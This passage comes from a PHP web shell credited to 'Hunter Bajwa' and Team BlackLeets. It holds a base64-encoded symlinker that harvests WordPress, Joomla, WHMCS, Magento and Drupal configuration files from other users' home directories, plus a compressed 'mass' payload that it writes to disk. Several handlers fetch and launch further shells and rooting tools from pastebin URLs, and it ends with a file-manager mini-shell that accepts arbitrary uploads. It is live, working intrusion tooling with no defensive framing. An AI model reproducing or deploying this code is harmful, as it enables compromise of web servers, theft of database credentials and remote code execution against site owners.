dXNlciAuICcvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywgJHVzZXIgLiAnLXdvcmRwcmVzcy1ibG9nLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL25ld3Mvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3MtbmV3cy50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9uZXcvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13b3JkcHJlc3MtbmV3LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2Jsb2cvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13cC1ibG9nLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsICR1c2VyIC4gJy13cC1iZXRhLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2Jsb2dzL3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd3AtYmxvZ3MudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywgJHVzZXIgLiAnLXdwLWhvbWUudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvZGIucGhwJywgJHVzZXIgLiAnLWRiY29uZi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9zaXRlL3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd3Atc2l0ZS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9tYWluL3dwLWNvbmZpZy5waHAnLCAkdXNlciAuICctd3AtbWFpbi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy13cC10ZXN0LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1qb29tbGEyLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL3BvcnRhbC9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1qb29tbGEtcHJvdGFsLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2pvby9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1qb28udHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLWpvb21sYS1jbXMudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvc2l0ZS9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1qb29tbGEtc2l0ZS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9tYWluL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLWpvb21sYS1tYWluLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctam9vbWxhLW5ld3MudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvbmV3L2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLWpvb21sYS1uZXcudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvaG9tZS9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1qb29tbGEtaG9tZS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC93aG0vY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctd2htMTUudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvY2VudHJhbC9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy13aG0tY2VudHJhbC50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctd2htLXdobWNzLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL3dobS9XSE1DUy9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy13aG0tV0hNQ1MudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd2htYy9XSE0vY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctd2htYy1XSE0udHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctd2htY3MudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1zdXBwb3J0LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLWpvb21sYS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9zdWJtaXR0aWNrZXQucGhwJywgJHVzZXIgLiAnLXdobWNzMi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC93aG0vY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctd2htLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2NsaWVudC9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1XaG00LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLVdobTUudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1XaG02LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2NsaWVudHMvY29uZmlndXJhdGlvbi5waHAnLCAkdXNlciAuICctV2htNy50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsICR1c2VyIC4gJy1XaG04LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL29yZGVyL2NvbmZpZ3VyYXRpb24ucGhwJywgJHVzZXIgLiAnLVdobTkudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvYWRtaW4vY29uZi5waHAnLCAkdXNlciAuICctNS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywgJHVzZXIgLiAnLU9wZW5fQ2FydC50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCAkdXNlciAuICctaW52aXNpby50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsICR1c2VyIC4gJy03LnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2Nvbm5lY3QucGhwJywgJHVzZXIgLiAnLTgudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvbWtfY29uZi5waHAnLCAkdXNlciAuICctbWstcG9ydGFsZTEudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywgJHVzZXIgLiAnLTEyLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL3NldHRpbmdzLnBocCcsICR1c2VyIC4gJy1TbWYudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsICR1c2VyIC4gJy12QnVsbGV0aW4xLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZy5waHAnLCAkdXNlciAuICctdkJ1bGxldGluMi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywgJHVzZXIgLiAnLXZCdWwzLVBocGJiMi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9jYy9pbmNsdWRlcy9jb25maWcucGhwJywgJHVzZXIgLiAnLXZCdWxsZXRpbjQudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvaW5jL2NvbmZpZy5waHAnLCAkdXNlciAuICctbXliYi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywgJHVzZXIgLiAnLUNvbmZpZy1QaHBiYjEudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvaW5jbHVkZXMvZnVuY3Rpb25zLnBocCcsICR1c2VyIC4gJy1waHBiYjMudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvb3BlbmNhcnQvYWRtaW4vY29uZmlnLnBocCcsICR1c2VyIC4gJy1PcGVuX2NhcnQyLnR4dCcpOwogICAgICAgIEBzeW1saW5rKCcvaG9tZS8nIC4gJHVzZXIgLiAnL3B1YmxpY19odG1sL2FwcC9ldGMvY29uZmlnLnhtbCcsICR1c2VyIC4gJy1NYWdlbnRvMS50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9hcHAvZXRjL2xvY2FsLnhtbCcsICR1c2VyIC4gJy1NYWdlbnRvMi50eHQnKTsKICAgICAgICBAc3ltbGluaygnL2hvbWUvJyAuICR1c2VyIC4gJy9wdWJsaWNfaHRtbC9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsICR1c2VyIC4gJy1EcnVwYWwudHh0Jyk7CiAgICAgICAgQHN5bWxpbmsoJy9ob21lLycgLiAkdXNlciAuICcvcHVibGljX2h0bWwvZHJ1cGFsL3NpdGVzL2RlZmF1bHQvc2V0dGluZ3MucGhwJywgJHVzZXIgLiAnLURydXBhbC50eHQnKTsKICAgIH0KICAgIGVjaG8gJzxiIGNsYXNzPSJjb25lIj48Zm9udCBmYWNlPSJUYWhvbWEiIGNvbG9yPSJMYXduR3JlZW4iIHNpemU9IjJwdCI+PGI+Q29uZ3JhdHVsYXRpb24gPT0+PiA8L2I+IDxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJCYWp3YSI+PGZvbnQgY29sb3I9Ikxhd25HcmVlbiIgc2l6ZT0iMnB0Ij5Db25maWcgbGlzdDwvYT48L2ZvbnQ+PC9iPic7Cn0KZWNobyAnPGJyPjxicj48YnI+PGJyPic7CmVjaG8gJyoqWyBVcGxvYWRlciBdKionOwplY2hvICc8YnI+PGJyPic7CmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOwppZiAoJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIpIHsKICAgIGlmIChAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgewogICAgICAgIGVjaG8gJzxiPjxmb250IGNvbG9yPSJMYXduR3JlZW4iPlVwbG9hZCBTdWNjZXNzZnVsbHkhISEgPC9mb250PjwvYj48YnI+PGJyPic7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gJzxiPjxmb250IGNvbG9yPSJyZWQiPlVwbG9hZCBGYWlsZWQhISEgPC9iPjxicj48L2ZvbnQ+JzsKICAgIH0KfQo/Pjxicj48YnI+CjxkaXYgaWQ9Im5hbWUiPiZjb3B5OyA8YSBocmVmPSJodHRwczovL3d3dy5mYWNlYm9vay5jb20vQmxhY2tMZWV0czEzMzcvIiB0YXJnZXQ9Il9ibGFuayI+VGVhbSBCbGFja0xlZXRzPC9hPi4gQ29kZWQgJiBNb2RpZmllZCBCeSA8YSBocmVmPSJodHRwczovL3d3dy5mYWNlYm9vay5jb20vSHVudGVyQmFqd2FPZmZpY2lhbC8iIHRhcmdldD0iX2JsYW5rIj5IdW50ZXIgQmFqd2E8L2E+ICYgPGEgaHJlZj0iaHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL0h1bnRlci5CYWp3YTEzMzciIHRhcmdldD0iX2JsYW5rIj4hISEhPC9hPjwvZGl2Pgo8L2JvZHk+PC9odG1sPg==";
1608 $lalala = @fopen("symlinker.php", "w");
1609 @fwrite($lalala, htmlspecialchars_decode(gzinflate(base64_decode($php_symlinker))));
1610 @fclose($lalala);
1611 header("Location:symlinker.php");
1612 }
1613
1614 if (isset($_POST['mass'])) {
1615 $php_mass = "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";
1616 $lalalala = @fopen("mass.php", "w");
1617 @fwrite($lalalala, htmlspecialchars_decode(gzinflate(base64_decode($php_mass))));
1618 @fclose($lalalala);
1619 header("Location:mass.php");
1620 }
1621
1622 if (isset($_POST['madleets'])) {
1623 download_remote_file('http://pastebin.com/raw/M9mx5j4h', realpath("./") . '/madleets.php');
1624 header("location:madleets.php"); }
1625
1626 if (isset($_POST['rooter'])) {
1627 download_remote_file('http://pastebin.com/raw/sJxiRZAH', realpath("./") . '/rooter.php');
1628 header("location:rooter.php"); }
1629
1630 if (isset($_POST['cpc'])) {
1631 download_remote_file('http://pastebin.com/raw/d73HhXBk', realpath("./") . '/cpc.php');
1632 header("location:cpc.php"); }
1633
1634 if (isset($_POST['anonghosts'])) {
1635 download_remote_file('http://pastebin.com/raw/Cm3WsQXL', realpath("./") . '/anonghosts.php');
1636 header("location:anonghosts.php"); }
1637
1638 if (isset($_POST['blackhat'])) {
1639 download_remote_file('http://pastebin.com/raw/XFs2pPBM', realpath("./") . '/blackhat.php');
1640 header("location:blackhat.php"); }
1641
1642 if (isset($_POST['imageshell'])) {
1643 download_remote_file('http://pastebin.com/raw/eTbTMB4y', realpath("./") . '/imageshell.php');
1644 header("location:imageshell.php"); }
1645
1646 if (isset($_POST['madspot'])) {
1647 download_remote_file('http://pastebin.com/raw/mjKJRfXA', realpath("./") . '/madspot.php');
1648 header("location:madspot.php"); }
1649
1650 if (isset($_POST['pcd'])) {
1651 download_remote_file('http://pastebin.com/raw/cBiiU6MR', realpath("./") . '/pcd.php');
1652 header("location:pcd.php"); }
1653
1654 if (isset($_POST['cheta'])) {
1655 download_remote_file('http://pastebin.com/raw/H6ah5rnF', realpath("./") . '/cheta.php');
1656 header("location:cheta.php"); }
1657
1658 if (isset($_POST['zone'])) {
1659 download_remote_file('http://pastebin.com/raw/LsRHWmAD', realpath("./") . '/zone.php');
1660 header("location:zone.php"); }
1661
1662
1663 if (isset($_POST['1337worm'])) {
1664 download_remote_file('http://pastebin.com/raw/7WwNgWHh', realpath("./") . '/1337worm.php');
1665 header("location:1337worm.php"); }
1666
1667
1668 if (isset($_POST['joker'])) {
1669 download_remote_file('http://pastebin.com/raw/eLT2PtZN', realpath("./") . '/joker.php');
1670 header("location:joker.php"); }
1671
1672
1673 if (isset($_POST['b374k'])) {
1674 download_remote_file('http://pastebin.com/raw/UZuF1RKJ', realpath("./") . '/b374k.php');
1675 header("location:b374k.php"); }
1676
1677
1678if(isset($_GET['mini_shell']))
1679{
1680
1681set_time_limit(0);
1682error_reporting(0);
1683
1684if(get_magic_quotes_gpc()){
1685 foreach($_POST as $key=>$value){
1686 $_POST[$key] = stripslashes($value);
1687 }
1688}
1689echo '<!DOCTYPE HTML>
1690<HTML>
1691<HEAD>
1692<link href="" rel="stylesheet" type="text/css">
1693<title>Hunter Bajwa File Manager</title>
1694<style>
1695body{
1696 font-family: "Racing Sans One", cursive;
1697 background-color: #e6e6e6;
1698 text-shadow:0px 0px 1px #757575;
1699}
1700#content tr:hover{
1701 background-color: #636263;
1702 text-shadow:0px 0px 10px #fff;
1703}
1704#content .first{
1705 background-color: silver;
1706}
1707#content .first:hover{
1708 background-color: silver;
1709 text-shadow:0px 0px 1px #757575;
1710}
1711table{
1712 border: 1px #000000 dotted;
1713}
1714H1{
1715 font-family: "Rye", cursive;
1716}
1717a{
1718 color: #000;
1719 text-decoration: none;
1720}
1721a:hover{
1722 color: #fff;
1723 text-shadow:0px 0px 10px #ffffff;
1724}
1725input,select,textarea{
1726 border: 1px #000000 solid;
1727 -moz-border-radius: 5px;
1728 -webkit-border-radius:5px;
1729 border-radius:5px;
1730}
1731</style>
1732</HEAD>
1733<BODY>
1734<H1><center>Hunter Bajwa File Manager</center></H1>
1735<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
1736<tr><td>Current Path : ';
1737if(isset($_GET['mini_shell']) && ($_GET['path'])){
1738 $path = $_GET['path'];
1739}else{
1740 $path = getcwd();
1741}
1742$path = str_replace('\\','/',$path);
1743$paths = explode('/',$path);
1744
1745foreach($paths as $id=>$pat){
1746 if($pat == '' && $id == 0){
1747 $a = true;
1748 echo '<a href="?mini_shell&path=/">/</a>';
1749 continue;
1750 }
1751 if($pat == '') continue;
1752 echo '<a href="?mini_shell&path=';
1753 for($i=0;$i<=$id;$i++){
1754 echo "$paths[$i]";
1755 if($i != $id) echo "/";
1756 }
1757 echo '">'.$pat.'</a>/';
1758}
1759echo '</td></tr><tr><td>';
1760if(isset($_FILES['file'])){
1761 if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
1762 echo '<font color="green">File Upload Done.</font><br />';
1763 }else{
1764 echo '<font color="red">File Upload Error.</font><br />';
1765 }
1766}
1767echo '<form enctype="multipart/form-data" method="POST">
1768Upload File : <input type="file" name="file" />
1769<input type="submit" value="upload" />
1770</form>
1771</td></tr>';
1772 if(isset($_GET['filesrc'])){
